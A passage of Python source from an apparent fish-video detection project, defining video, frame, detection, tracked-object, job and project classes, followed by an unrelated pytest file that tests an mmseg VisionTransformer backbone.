cv.resize( # type: ignore\n new_img,\n (self.output_width, self.output_height),\n interpolation=cv.INTER_AREA, # type: ignore\n )\n return new_img\n\n def vidcap_release(self) -> None:\n \"\"\"Release Video Capture.\"\"\"\n self._video_capture.release()\n\n def __iter__(self) -> Video:\n \"\"\"Class iterator.\n\n This never releases the VideoCapture. Not sure if it's kept alive, and\n if that's the case, this could cause a memory leak. 
\n See Also\n --------\n Video.vidcap_release()\n\n \"\"\"\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n self._video_capture.set(cv.CAP_PROP_POS_MSEC, 0) # type: ignore\n return self\n\n def __next__(self) -> np.ndarray:\n \"\"\"Get next item from iterator.\n\n Return:\n ------\n np.ndarray\n One frame of video as `ndarray`.\n\n \"\"\"\n retval, img = self._video_capture.read()\n if not retval:\n self.vidcap_release()\n raise StopIteration\n return self._scale_convert(img)\n\n def __get__(self, key: int, owner: object | None = None) -> np.ndarray:\n \"\"\"Get one frame of video.\n\n Used by `__getitem__` when only one key is given.\n\n Returns\n -------\n numpy.ndarray\n One frame of video as `ndarray`.\n\n Raise\n -----\n RuntimeError :\n if OpenCV fails to either read or set properties.\n \"\"\"\n if key < 0:\n raise IndexError\n\n if key >= self.frame_count:\n raise IndexError\n\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(cv.CAP_PROP_POS_FRAMES, key) # type: ignore\n\n if not retval:\n raise RuntimeError( # pragma: no cover\n f\"Unexpected error when setting capture property, {retval}\",\n )\n\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\n f\"Unexpected error when reading frame at {key}\",\n ) # pragma: no cover\n\n self._video_capture.release()\n\n return self._scale_convert(img)\n\n def __getitem__(self, interval: slice | int) -> np.ndarray:\n \"\"\"Get a slice of video.\n\n Get an interval of frames from the video, `variable[start:stop:step]`.\n Note `step` is not implemented and will raise an exception.\n\n Examples\n --------\n >>> video = Video.from_path(\"test.mp4\")\n >>> one_frame = video[5]\n >>> print(one_frame.shape)\n (720, 1280, 3)\n >>> many_frames = video[5:10]\n >>> print(many_frames.shape)\n (5, 720, 1280, 3)\n\n Returns\n -------\n numpy.ndarray\n Interval of frames returned in format\n `(frame, height, width, channels)`\n\n See Also\n --------\n __get__ : Used when only start in slice given.\n\n Raise\n -----\n RuntimeError :\n if OpenCV fails to either read or set properties.\n \"\"\"\n # If only one key is given\n if isinstance(interval, int):\n return self.__get__(interval)\n\n if not isinstance(interval, slice):\n raise TypeError(f\"Expected int or slice, got {type(interval)}\")\n\n if isinstance(interval.stop, int) and interval.stop >= self.frame_count:\n raise IndexError(\n f\"Index for stop in slice greater than frame count {self.frame_count}\",\n )\n\n if interval.start < 0:\n raise IndexError(\"Index for start in slice is less than 0\")\n\n # Slice stepping is not implemented.\n if interval.step is not None:\n raise NotImplementedError(\"Step in slicing is not implemented\")\n\n # If slicing with `video[0:] or video[0:-1]` all frames from start to\n # end or end-1 of video is wanted.\n if interval.stop is None:\n stop = self.frame_count\n elif interval.stop < 0:\n stop = self.frame_count + interval.stop\n else:\n stop = interval.stop\n\n numbers = stop - interval.start\n\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(\n cv.CAP_PROP_POS_FRAMES,\n interval.start, # type: ignore\n )\n\n if not retval:\n raise RuntimeError(\"Unexpected error when setting capture position\") # pragma: no cover\n\n frames = []\n\n for _ in range(numbers):\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\"Unexpected error when reading frame\") # pragma: no 
cover\n frames.append(self._scale_convert(img))\n\n self._video_capture.release()\n return np.array(frames)\n\n def iter_from(self, start: int) -> Generator[np.ndarray, None, None]:\n \"\"\"Iterate from start to the end of the video.\n\n Parameter\n ---------\n start : int\n The frame to start at\n\n Yields\n ------\n np.ndarray :\n A single scaled frame.\n\n Raises\n ------\n RuntimeError :\n If unexpected errors occur with OpenCV\n \"\"\"\n if start >= self.frame_count or start < 0:\n raise IndexError(\n f\"Start is out of bounds for buffer of size {self.frame_count}, got {start}\",\n )\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(cv.CAP_PROP_POS_FRAMES, start) # type: ignore\n\n if not retval:\n raise RuntimeError(\"Unexpected error when setting capture position\") # pragma: no cover\n\n numbers = self.frame_count - start\n\n for _ in range(numbers):\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\"Unexpected error when reading frame\") # pragma: no cover\n yield self._scale_convert(img)\n\n self._video_capture.release()\n\n def __len__(self) -> int:\n \"\"\"Get length of video in frames.\"\"\"\n return self.frame_count\n\n def exists(self) -> bool:\n \"\"\"Check if the file path is a valid file.\"\"\"\n return os.path.isfile(self._path)\n\n @classmethod\n def from_path(\n cls,\n path: str,\n output_width: int = VIDEO_DEFAULT_WIDTH,\n output_height: int = VIDEO_DEFAULT_HEIGHT,\n ) -> Video:\n \"\"\"Named constructor to create a `Video` from path.\n\n Examples\n --------\n >>> video = Video.from_path(\"video.mp4\")\n >>> type(video)\n <class 'model.Video'>\n\n Raises\n ------\n FileNotFoundError\n If the file at `path` does not exist.\n \"\"\"\n if not Path(path).exists():\n raise FileNotFoundError(f\"Video file {path} not found.\")\n\n timestamp = parse_str_to_date(Path(path).name)\n if timestamp is None:\n raise TimestampNotFoundError(f\"No timestamp found for file {path}\")\n\n height, width, fps, frame_numbers = _get_video_metadata(path)\n\n return cls(\n path=path,\n frame_count=frame_numbers,\n fps=fps,\n width=width,\n height=height,\n timestamp=timestamp,\n output_width=output_width,\n output_height=output_height,\n )\n\n def timestamp_at(self, idx: int) -> datetime:\n \"\"\"Return timestamp at index in video.\n\n Parameter\n ---------\n idx : int\n Index in video.\n\n Return:\n ------\n datetime :\n Timestamp for the frame at index.\n\n \"\"\"\n if idx > self.frame_count:\n raise IndexError\n if idx < 0:\n raise IndexError\n\n return self.timestamp + (timedelta(seconds=int(idx / self.fps)))\n\n def add_detection_frame(self, frame: Frame) -> None:\n \"\"\"Add a single data-frame of detections to this video.\n\n Parameters\n ----------\n frame : Frame\n Data-frame to add to this video, containing the detections for a\n given frame index.\n\n Raises\n ------\n RuntimeError\n When a frame with the same index is already added to this video.\n IndexError\n When the frame index goes past the total frames in the video.\n \"\"\"\n if frame in self.frames:\n raise RuntimeError(\n f\"Frame with index {frame.idx} is already added to this video.\",\n )\n if frame.idx > self.frame_count:\n raise IndexError(\n f\"Frame of index {frame.idx} is beyond total frames in video.\",\n )\n\n self.frames.append(frame)\n\n def is_processed(self) -> bool:\n \"\"\"Check if this video has been fully processed.\n\n Return:\n ------\n bool :\n True if the entire video has been processed, i.e. every frame in\n the video has a matching data-frame in `self.frames`.\n \"\"\"\n if not len(self.frames) == self.frame_count:\n logger.info(\n f\"Video {self._path} is not fully processed. {len(self.frames)}/{self.frame_count}\",\n )\n return False\n\n # Check that the frame indices are continuous\n for i in range(self.frame_count):\n if self.frames[i].idx != i:\n logger.warning(\n f\"Frame index {self.frames[i].idx} does not match video index {i}\",\n )\n return False\n\n logger.info(f\"Video {self._path} is processed.\")\n return True\n\n\ndef parse_str_to_date(string: str, offset_min: int = 30) -> datetime | None:\n \"\"\"Parse string to date.\n\n Input can either be a string with a date, or a string with a date and\n offset. If an offset is found, `offset_min` will be multiplied with the\n offset and the result will be added to the returned date.\n\n Parameter\n ---------\n string: str\n string to parse to a date, on the format:\n `[yyyy-mm-dd_hh-mm-ss]` or `[yyyy-mm-dd_hh-mm-ss]-xxx`\n offset_min: int\n Minutes to offset for each increment\n\n\n Return:\n ------\n datetime :\n parsed datetime object, or None if unsuccessful\n\n Example:\n -------\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10]-000.mp4\")\n datetime.datetime(2020, 3, 28, 12, 30, 10)\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10]-001.mp4\")\n datetime.datetime(2020, 3, 28, 13, 0, 10)\n >>> parse_str_to_date(\"test-[2020-03-28_12-30-10].mp4\")\n datetime.datetime(2020, 3, 28, 12, 30, 10)\n >>> parse_str_to_date(\"test.mp4\")\n None\n \"\"\"\n match = re.compile(\n r\"\\[\\d{4}(-\\d{2}){2}_(\\d{2}-){2}\\d{2}\\](-\\d{3})?\",\n ).search(string)\n\n if not match:\n logger.warning(f\"no date found in str, {string}\")\n return None\n\n try:\n # Offset is optional in the regex, (-\\d{3})?. This tries to split on\n # \"]-\", which only succeeds if an offset exists, `[...]-xxx`. If it\n # fails it means there is no offset.\n timestamp, offset = match[0].split(\"]-\")\n\n # timestamp still has a \"[\" at the start. This strips it.
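\n # For example, match[0] == \"[2020-03-28_12-30-10]-001\" (the doctest input\n # above) splits into \"[2020-03-28_12-30-10\" and \"001\".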
\n timestamp = timestamp[1:]\n offset_int: int = int(offset)\n except ValueError:\n # No offset found, so only grab what's inside the brackets, and set\n # offset to zero.\n timestamp = match[0][1:-1]\n offset_int = 0\n\n date = \"-\".join(timestamp.split(\"_\"))\n\n year, month, day, hour, minute, second = (int(x) for x in date.split(\"-\"))\n\n try:\n return datetime(year, month, day, hour, minute, second) + timedelta(\n minutes=offset_min * offset_int,\n )\n except ValueError:\n return None\n\n\ndef _get_video_metadata(path: str) -> tuple[int, ...]:\n \"\"\"Get metadata from video using `opencv`.\n\n Parameter\n ---------\n path : str\n path to file to get metadata from.\n\n Return:\n ------\n Tuple[int, int, int, int] :\n A tuple with the metadata:\n (height, width, FPS, frame_count)\n\n Raises\n ------\n FileNotFoundError:\n If the file can't be opened, FileNotFoundError is raised.\n RuntimeError:\n If there are problems getting any metadata.\n \"\"\"\n video = cv.VideoCapture(path) # type: ignore\n\n if not video.isOpened():\n raise FileNotFoundError(f\"Could not open {path}\")\n\n metadata = (\n int(video.get(cv.CAP_PROP_FRAME_HEIGHT)), # type: ignore\n int(video.get(cv.CAP_PROP_FRAME_WIDTH)), # type: ignore\n int(video.get(cv.CAP_PROP_FPS)), # type: ignore\n int(video.get(cv.CAP_PROP_FRAME_COUNT)), # type: ignore\n )\n\n video.release()\n\n # Frame count becomes \"-9223372036854775808\" when testing with png. Opencv\n # should return 0 if it fails, but apparently not in this case...\n for meta in metadata:\n if meta < 1:\n raise RuntimeError(f\"Could not get metadata for file {path}\")\n\n return metadata\n\n\n@dataclass\nclass Frame:\n \"\"\"Simple dataclass representing frame.\"\"\"\n\n idx: int\n detections: list[Detection]\n timestamp: datetime | None = None\n video_id: int | None = None\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check if two Frames are the same.\"\"\"\n return (\n isinstance(other, Frame)\n and self.idx == other.idx\n and self.video_id == other.video_id\n )\n\n def to_json(self) -> dict[str, Any]:\n \"\"\"Convert frame to json.\n\n Return:\n ------\n Dict[str, Any] :\n Object as json:\n {\n \"idx\": int,\n \"detections\": List[Detection],\n \"timestamp\": None|str\n }\n\n \"\"\"\n timestamp_tmp: str | None = None\n if self.timestamp:\n timestamp_tmp = self.timestamp.isoformat()\n\n return {\n \"idx\": self.idx,\n \"detections\": [det.to_json() for det in self.detections if det],\n \"timestamp\": timestamp_tmp,\n \"video_id\": self.video_id,\n }\n\n\n@dataclass\nclass BBox:\n \"\"\"Class representing a Bounding box.\"\"\"\n\n x1: float\n y1: float\n x2: float\n y2: float\n\n\n@dataclass\nclass Detection:\n \"\"\"Class representing a Detection.\n\n Parameter\n ---------\n bbox: BBox\n A bounding box\n probability: float\n Probability from detection\n label: int\n Class label from detection\n frame: int\n Which absolute frame it belongs to\n frame_id: int\n The relative frame in a video\n video_id: int\n ID of the video this detection is found in.\n\n Example:\n -------\n >>> bbox = BBox(10, 20, 30, 40)\n >>> detection = Detection(bbox, 0.8, 1, 4)\n >>> print(detection)\n Detection(bbox=BBox(x1=10, y1=20, x2=30, y2=40), probability=0.8, label=1, frame=4, frame_id=None, video_id=None)\n \"\"\"\n\n bbox: BBox\n probability: float\n label: int\n frame: int\n frame_id: int | None = None\n video_id: int | None = None\n\n def to_json(self) -> dict[str, Any]:\n \"\"\"Convert detection to json.\n\n Return:\n ------\n Dict[str, Any] :\n Detection as json,\n {\n \"bbox\": BBox,\n \"probability\": 
float,\n \"label\": int,\n \"frame\": int,\n }\n\n \"\"\"\n return {\n \"bbox\": asdict(self.bbox),\n \"probability\": self.probability,\n \"label\": self.label,\n \"frame\": self.frame,\n \"frame_id\": self.frame_id,\n \"video_id\": self.video_id,\n }\n\n def set_frame(\n self,\n frame: int,\n frame_id: int,\n video_id: int,\n ) -> Detection:\n \"\"\"Update frame numbers.\n\n Returns itself so it can be used in list comprehensions.\n\n Parameter\n ---------\n frame : int\n The absolute frame number the detection is found in.\n frame_id : int\n The relative frame number within the video.\n video_id : int\n Id of the video the detection is found in.\n\n Return:\n ------\n Detection :\n Returns self.\n \"\"\"\n if not isinstance(frame_id, int):\n raise RuntimeError(f\"Frame: expected int, got {type(frame_id)}\")\n\n if not isinstance(video_id, int):\n raise RuntimeError(f\"Video: expected int, got {type(video_id)}\")\n\n self.frame = frame\n self.frame_id = frame_id\n self.video_id = video_id\n\n return self\n\n @classmethod\n def from_api(\n cls,\n bbox: dict[str, Any],\n probability: float,\n label: int,\n frame: int,\n frame_id: int,\n video_id: int,\n ) -> Detection:\n \"\"\"Create Detection class from tracker.\n\n Parameter\n ---------\n bbox: Dict[str, Any]\n Dict representation of BBox\n probability: float\n Probability from detection\n label: int\n Class label from detection\n frame: int\n Which frame it belongs to\n\n Return:\n ------\n Detection :\n A detection object\n \"\"\"\n return cls(BBox(**bbox), probability, label, frame, frame_id, video_id)\n\n\nclass Object:\n \"\"\"Class representation of an object that has been detected and tracked.\"\"\"\n\n def __init__(\n self,\n label: int,\n detections: list[Detection] | None = None,\n track_id: int | None = None,\n ) -> None:\n \"\"\"Create an Object.\n\n Parameters\n ----------\n label : int\n The label given to it by the tracker and detector\n detections : List[Detection]\n List of detections associated with this object. Default=[]\n track_id : int\n Tracking ID for this object. Default=None\n \"\"\"\n self.id: int | None\n self.label: int = label\n self.probability: float = 0.0\n self._detections = detections if detections is not None else []\n self.track_id: int | None = track_id\n self.time_in: datetime | None = None\n self.time_out: datetime | None = None\n self._calc_label()\n\n def to_api(self) -> dict[str, Any]:\n \"\"\"Convert relevant member data for use in api.\n\n Returns\n -------\n Dict[str, Any]\n Returns mapping between variable name and value.\n \"\"\"\n return {\n \"id\": self.id,\n \"label\": self.label,\n \"probability\": self.probability,\n \"_detections\": self._detections,\n \"time_in\": self.time_in,\n \"time_out\": self.time_out,\n \"video_ids\": self.video_ids,\n }\n\n def _calc_label(self) -> None:\n \"\"\"Calculate label.\"\"\"\n if len(self._detections) == 0:\n return\n\n self.label = int(\n np.bincount([detect.label for detect in self._detections]).argmax(),\n )\n\n self.probability = sum(\n detect.probability\n for detect in self._detections\n if detect.label == self.label\n ) / len(self._detections)\n\n @classmethod\n def from_api(\n cls,\n track_id: int,\n detections: list[dict[str, Any]],\n label: int,\n ) -> Object:\n \"\"\"Create Object class from tracker.\n\n Parameter\n ---------\n track_id : int\n track_id from tracker\n detections : List[Dict[str, Any]]\n List of detections associated.\n label : int\n Class label\n\n Return:\n ------\n Object :\n Fully featured Object.\n \"\"\"\n dets = [Detection.from_api(**detect) for detect in detections]\n return cls(label, dets, track_id)\n\n def get_results(self) -> dict[str, Any]:\n \"\"\"Return information on this object.\n\n Return:\n ------\n Dict[str, Any] :\n\n \"\"\"\n self._calc_label()\n\n return {\n \"track_id\": self.track_id,\n \"label\": self.label,\n \"probability\": self.probability,\n \"time_in\": self.time_in,\n \"time_out\": self.time_out,\n }\n\n def __eq__(self, o: object) -> bool:\n \"\"\"Check if two Objects are same.\n\n Currently, this doesn't do much, but in the future, it should also\n compare the detections themselves.\n \"\"\"\n return (\n isinstance(o, Object)\n and self.label == o.label\n and self.probability == o.probability\n and len(self._detections) == len(o._detections)\n )\n\n def add_detection(self, detection: Detection) -> None:\n \"\"\"Add a detection to the object.\n\n Parameter\n ---------\n detection : Detection\n \"\"\"\n self._detections.append(detection)\n self._calc_label()\n\n def number_of_detections(self) -> int:\n \"\"\"Return the number of detections.\n\n Return:\n ------\n int :\n Number of detections\n \"\"\"\n return len(self._detections)\n\n def get_detection(self, idx: int) -> Detection | None:\n \"\"\"Return the detection at index idx.\n\n Parameter\n ---------\n idx: int\n Index\n\n Return:\n ------\n Optional[Detection] :\n Detection at index idx or None if none found.\n \"\"\"\n try:\n return self._detections[idx]\n except IndexError:\n return None\n\n def get_frames(self) -> list[tuple[int | None, int | None, BBox]]:\n \"\"\"Return which frame and which video this object is in.\n\n frame_id tells what frame in the video with video_id contains a\n detection associated with this object.\n\n Return:\n ------\n List[Tuple[Optional[int], Optional[int], BBox]] :\n [(frame_id, video_id, bbox), (frame_id, video_id, bbox)]\n \"\"\"\n return [\n (det.frame_id, det.video_id, det.bbox) for det in self._detections\n ]\n\n @property\n def video_ids(self) -> list[int]:\n \"\"\"Derive all videos the object is part of.\n\n Return:\n ------\n List[int]\n List 
of video ids.\n \"\"\"\n video_id: set[int] = set()\n for det in self._detections:\n if det.video_id is not None:\n video_id.add(det.video_id)\n return list(video_id)\n\n\nclass Job:\n \"\"\"Class representation of a job.\"\"\"\n\n def __init__(\n self,\n name: str,\n description: str,\n location: str,\n status: Status = Status.PENDING,\n progress: int = 0,\n ) -> None:\n self.id: int | None = None\n self.name: str = name\n self.description: str = description\n self._status: Status = status\n self._objects: list[Object] = []\n self.videos: list[Video] = []\n self.location: str = location\n self.next_batch: int = 0\n self.progress: int = progress\n\n @property\n def stats(self) -> dict[str, Any]:\n \"\"\"Return statistics for a job.\n\n Return:\n ------\n Dict[str, Any] :\n {\n total_objects : int\n total_labels: int\n labels : {\n int : int\n int : int\n ...\n }\n }\n \"\"\"\n dct: dict[str, Any] = {\n \"total_labels\": 0,\n \"total_objects\": 0,\n \"labels\": {},\n }\n\n labels: dict[int, int] = {}\n\n for o in self._objects:\n if o.label not in labels:\n labels[o.label] = 0\n labels[o.label] += 1\n\n dct[\"labels\"] = labels\n dct[\"total_labels\"] = len(dct[\"labels\"])\n dct[\"total_objects\"] = len(self._objects)\n\n return dct\n\n def __hash__(self) -> int:\n \"\"\"Hash of object used in eg. `set()` to avoid duplicates.\"\"\"\n return hash(\n (type(self),)\n + (self.name, self.description, self.id, self.location),\n )\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check if job is equal to another object.\"\"\"\n if not isinstance(other, Job):\n return False\n # Note: Will not be able to check equality if jobs do not have `id`,\n # as this is the only unique parameter. A job without `id` is not\n # seen by `repository` before, so it is a new `job`.\n if self.id and other.id:\n return self.id == other.id\n return False\n\n def __repr__(self) -> str:\n \"\"\"Override of default __repr__. Gives object representation as a string.\"\"\"\n return str(self.__class__) + \": \" + str(self.__dict__)\n\n def add_object(self, obj: Object) -> None:\n \"\"\"Add an object to a job.\n\n Parameter\n ---------\n obj : Object\n An object to add\n \"\"\"\n self._objects.append(obj)\n\n def number_of_objects(self) -> int:\n \"\"\"Return number of objects.\n\n Return:\n ------\n int :\n Number of objects\n \"\"\"\n return len(self._objects)\n\n def get_object(self, idx: int) -> Object | None:\n \"\"\"Return object at index.\n\n Parameter\n ---------\n idx : int\n Index in the list\n\n Return:\n ------\n Optional[Object] :\n Object at index idx. If none are found, returns None.\n \"\"\"\n try:\n return self._objects[idx]\n except IndexError:\n return None\n\n def get_result(self) -> list[dict[str, Any]]:\n \"\"\"Return result from all objects.\n\n Return:\n ------\n List[Dict[str, Any]] :\n\n \"\"\"\n return [obj.get_results() for obj in self._objects]\n\n def add_video(self, video: Video) -> bool:\n \"\"\"Add a video to this job in order to be processed.\n\n Parameter\n ---------\n video : Video\n Video to add to this job. Must have a valid timestamp.\n\n Return:\n ------\n bool :\n True if video has a set timestamp, and is not already in the\n videos list. False otherwise.\n\n \"\"\"\n if video.timestamp is None:\n logger.warning(\"Videos added to job must have set timestamp.\")\n return False\n\n if video in self.videos:\n logger.warning(\"Attempted to add an existing video to a job.\")\n return False\n\n self.videos.append(video)\n self.videos.sort(key=lambda x: x.timestamp.timestamp())\n return True\n\n def add_videos(self, videos: list[Video]) -> bool:\n \"\"\"Add a list of videos to this job in order to be processed.\n\n Parameter\n ---------\n videos : List[Video]\n List of videos to add. All must have a valid timestamp.\n\n Return:\n ------\n bool :\n True if all videos in the list have a timestamp, False otherwise.\n No videos get added if False is returned.\n \"\"\"\n for video in videos:\n if video in self.videos:\n logger.warning(\"Video has already been added to the job.\")\n return False\n\n if video.timestamp in [v.timestamp for v in videos if v != video]:\n logger.warning(\"Duplicate timestamp.\")\n return False\n\n for video in videos:\n self.videos.append(video)\n\n self.videos.sort(key=lambda x: x.timestamp.timestamp())\n return True\n\n def remove_video(self, video: Video) -> bool:\n \"\"\"Remove an existing video from this job.\n\n Parameter\n ---------\n video : Video\n Video to remove from the job.\n\n Return:\n ------\n bool :\n True if the video was removed from the job. False otherwise.\n \"\"\"\n if video in self.videos:\n self.videos.remove(video)\n return True\n else:\n return False\n\n def total_frames(self) -> int:\n \"\"\"Get the total frames in all videos for this job.\n\n Return:\n ------\n int :\n Amount of frames in total over all video objects in this job.\n \"\"\"\n return sum(v.frame_count for v in self.videos)\n\n def status(self) -> Status:\n \"\"\"Get the job status for this job.\"\"\"\n return self._status\n\n def start(self) -> None:\n \"\"\"Mark the job as started.\"\"\"\n if self._status is Status.DONE or self._status is Status.RUNNING:\n raise JobStatusException(\n \"A running or completed job can not be started.\",\n )\n logger.debug(\"Job '%s' starting\", self.name)\n self._status = Status.RUNNING\n\n def pause(self) -> None:\n \"\"\"Mark the job as paused.\"\"\"\n if self._status not in [Status.RUNNING, Status.QUEUED]:\n raise JobStatusException(\"Only a running or queued job can be paused.\")\n logger.debug(\"Job '%s' paused\", self.name)\n self._status = Status.PAUSED\n\n def complete(self) -> None:\n \"\"\"Mark the job as completed.\"\"\"\n if self._status is not Status.RUNNING:\n raise JobStatusException(\"Only a running job can be completed.\")\n logger.debug(\"Job '%s' marked as completed\", self.name)\n self._status = Status.DONE\n\n def queue(self) -> None:\n \"\"\"Mark the job as queued.\"\"\"\n if self._status not in [Status.PENDING, Status.PAUSED]:\n raise JobStatusException(\n \"Only a pending or paused job can be queued.\",\n )\n logger.debug(\"Job '%s' marked as queued\", self.name)\n self._status = Status.QUEUED\n\n def mark_as_error(self) -> None:\n \"\"\"Mark the job as in an error state.\"\"\"\n if self._status is not Status.RUNNING:\n raise JobStatusException(\"Only a running job can error\")\n logger.debug(\"Job '%s' has status as error\", self.name)\n self._status = Status.ERROR\n\n\nclass JobStatusException(Exception):\n \"\"\"Exception raised when a job attempts to change into an invalid state.\"\"\"\n\n\nclass Project:\n \"\"\"Project class.\n\n Top level abstraction for organisation of jobs connected to specified\n projects.\n\n Parameters\n ----------\n id : int\n Project internal id number\n name : str\n Project name\n number : str\n A unique project number. This number is a reference to an external\n reference number used by the user.\n location : str\n Optional string representing the location for this project.\n description : str\n Project description.\n\n Attributes\n ----------\n number_of_jobs : int\n Number of jobs associated with project.\n\n Methods\n -------\n add_job(job: Job)\n Adds a new job to project. No duplicates allowed.\n remove_job(job: Job)\n Removes job from project.\n get_jobs()\n Returns a list of associated jobs.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n number: str,\n description: str,\n location: str | None = None,\n ) -> None:\n self.id: int\n self.name: str = name\n self.number: str = number\n self.description: str = description\n self.location: str | None = location\n self.jobs: list[Job] = []\n\n def __str__(self) -> str:\n \"\"\"Print class members.\"\"\"\n return f\"Name: {self.name}, Description: {self.description}\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Check equality between objects.\n\n Operator used in tests to check if objects from the DB are correct.\n \"\"\"\n if not isinstance(other, Project):\n return False\n return (\n other.id == self.id\n and other.name == self.name\n and other.description == self.description\n and other.number == self.number\n and other.location == self.location\n )\n\n def __hash__(self) -> int:\n \"\"\"Hash of object used in eg. `dict()` or `set()` to avoid duplicates.\"\"\"\n return hash((type(self),) + tuple(self.__dict__))\n\n def __repr__(self) -> str:\n \"\"\"Override of default __repr__. Gives object representation as a string.\"\"\"\n return (\n str(self.__class__) + \": \" + str(self.__dict__)\n ) # pragma: no cover\n\n @classmethod\n def from_dict(cls, project_data: dict) -> Project:\n \"\"\"Only an example method of a \"named constructor\".\"\"\"\n return cls(\n name=project_data[\"name\"],\n number=project_data[\"number\"],\n description=project_data[\"description\"],\n location=project_data[\"location\"],\n )\n\n @property\n def number_of_jobs(self) -> int:\n \"\"\"Get number of jobs associated with project.\n\n Returns\n -------\n int\n Number of jobs in project\n \"\"\"\n return len(self.jobs)\n\n def add_job(self, job: Job) -> Project:\n \"\"\"Add job to project.\n\n Parameter\n ---------\n job : Job\n Job to be added to project.\n \"\"\"\n if job in self.jobs:\n logger.debug(\n \"Attempted to add existing job '%s' to a project\",\n job.name,\n )\n else:\n logger.debug(\"Added job '%s' to project\", job.name)\n self.jobs.append(job)\n return self\n\n def get_jobs(self) -> list[Job]:\n \"\"\"Retrieve all jobs from the project.\n\n Returns\n -------\n : List[Job]\n List containing all jobs within the project\n \"\"\"\n return self.jobs\n\n def get_job(self, job_id: int) -> Job | None:\n \"\"\"Retrieve a single job from the project.\n\n Parameters\n ----------\n job_id : int\n Index of the job we seek. 
0 is not valid.\n\n Returns\n -------\n Job\n The job object if found.\n \"\"\"\n for job in self.jobs:\n if job.id == job_id:\n return job\n\n return None\n\n def remove_job(self, job: Job) -> bool:\n \"\"\"Remove job from project.\n\n Parameters\n ----------\n job : Job\n Job to be removed.\n\n Returns\n -------\n bool\n True if the job was successfully removed\n \"\"\"\n if job in self.jobs:\n self.jobs.remove(job)\n logger.debug(\"Removed job with name '%s' from a project\", job.name)\n return True\n else:\n logger.debug(\n \"Could not find job with name '%s' to remove in project\",\n job.name,\n )\n return False\n","repo_name":"tomrtk/fish-code","sub_path":"src/core/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":39728,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"}
+{"seq_id":"72864906782","text":"import pytest\nimport torch\n\nfrom mmseg.models.backbones.vit import VisionTransformer\nfrom .utils import check_norm_state\n\n\ndef test_vit_backbone():\n with pytest.raises(TypeError):\n # pretrained must be a string path\n model = VisionTransformer()\n model.init_weights(pretrained=0)\n\n with pytest.raises(TypeError):\n # img_size must be int or tuple\n model = VisionTransformer(img_size=512.0)\n\n with pytest.raises(TypeError):\n # out_indices must be int ,list or tuple\n model = VisionTransformer(out_indices=1.)\n\n with pytest.raises(TypeError):\n # test upsample_pos_embed function\n x = torch.randn(1, 196)\n VisionTransformer.resize_pos_embed(x, 512, 512, 224, 224, 'bilinear')\n\n with pytest.raises(IndexError):\n # forward inputs must be [N, C, H, W]\n x = torch.randn(3, 30, 30)\n model = VisionTransformer()\n model(x)\n\n with pytest.raises(AssertionError):\n # The length of img_size tuple must be lower than 3.\n VisionTransformer(img_size=(224, 224, 224))\n\n with pytest.raises(TypeError):\n # Pretrained must be None or Str.\n VisionTransformer(pretrained=123)\n\n with pytest.raises(AssertionError):\n # with_cls_token must be True when output_cls_token == True\n VisionTransformer(with_cls_token=False, output_cls_token=True)\n\n # Test img_size isinstance tuple\n imgs = torch.randn(1, 3, 224, 224)\n model = VisionTransformer(img_size=(224, ))\n model.init_weights()\n model(imgs)\n\n # Test img_size isinstance tuple\n imgs = torch.randn(1, 3, 224, 224)\n model = VisionTransformer(img_size=(224, 224))\n model(imgs)\n\n # Test norm_eval = True\n model = VisionTransformer(norm_eval=True)\n model.train()\n\n # Test ViT backbone with input size of 224 and patch size of 16\n model = VisionTransformer()\n model.init_weights()\n model.train()\n\n assert check_norm_state(model.modules(), True)\n\n # Test normal size input image\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test large size input image\n imgs = torch.randn(1, 3, 256, 256)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 16, 16)\n\n # Test small size input image\n imgs = torch.randn(1, 3, 32, 32)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 2, 2)\n\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test unbalanced size input image\n imgs = torch.randn(1, 3, 112, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 7, 14)\n\n # Test irregular input image\n imgs = torch.randn(1, 3, 234, 345)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 15, 22)\n\n # Test with_cp=True\n model = VisionTransformer(with_cp=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test with_cls_token=False\n model = VisionTransformer(with_cls_token=False)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test final norm\n model = VisionTransformer(final_norm=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test patch norm\n model = VisionTransformer(patch_norm=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[-1].shape == (1, 768, 14, 14)\n\n # Test output_cls_token\n model = VisionTransformer(with_cls_token=True, output_cls_token=True)\n imgs = torch.randn(1, 3, 224, 224)\n feat = model(imgs)\n assert feat[0][0].shape == (1, 768, 14, 14)\n assert 
feat[0][1].shape == (1, 768)\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/contrib/cv/semantic_segmentation/DeeplabV3_for_Pytorch/tests/test_models/test_backbones/test_vit.py","file_name":"test_vit.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"}
